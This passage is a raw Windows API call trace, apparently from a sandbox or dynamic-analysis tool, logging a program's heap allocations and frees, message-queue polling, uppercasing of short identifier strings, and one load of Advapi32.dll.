lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0189.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0189.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0189.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0189.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0189.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0189.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0189.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0189.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0189.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0189.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0189.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0189.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0189.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0189.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0189.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0189.402] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0189.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0189.402] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0189.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0189.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0189.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9678 [0189.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0189.403] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0189.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0189.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0189.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0189.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0189.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0189.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0189.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0189.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0189.403] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0189.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0189.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0189.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0189.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0189.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0189.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0189.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0189.403] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0189.404] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0189.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0189.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0189.404] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0189.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0189.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0189.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa878 [0189.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0189.404] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0189.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0189.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0189.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0189.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0189.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0189.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0189.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0189.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0189.405] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0189.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0189.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0189.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0189.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0189.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0189.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0189.405] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0189.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0189.405] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0189.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0189.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0189.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0189.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0189.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0189.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0189.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0189.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0189.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0189.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0189.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0189.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0189.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0189.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0189.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0189.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0189.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0189.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0189.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0189.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0189.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0189.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0189.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0189.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0189.406] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0189.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0189.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0189.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0189.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0189.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0189.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0189.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0189.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0189.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0189.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0189.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0189.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0189.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0189.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0189.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0189.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0189.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0189.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0189.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.407] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0189.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0189.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0189.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0189.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0189.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0189.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0189.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0189.408] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0189.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0189.408] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0189.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0189.408] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0189.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0189.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0189.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c18 [0189.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0189.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0189.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0189.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0189.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac9f0 [0189.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0189.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0189.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0189.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0189.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0189.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0189.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0189.409] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0189.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0189.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0189.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0189.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0189.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0189.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0189.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0189.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0189.410] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0189.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0189.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0189.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0189.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0189.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0189.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0189.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0189.410] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0189.410] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0189.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0189.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0189.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0189.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0189.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0189.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0189.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0189.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0189.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0189.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0189.411] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0189.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0189.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0189.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0189.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0189.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0189.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0189.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0189.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.412] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0189.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0189.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0189.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0189.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0189.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0189.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0189.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0189.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0189.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0189.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0189.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0189.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.412] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0189.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0189.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0189.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0189.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 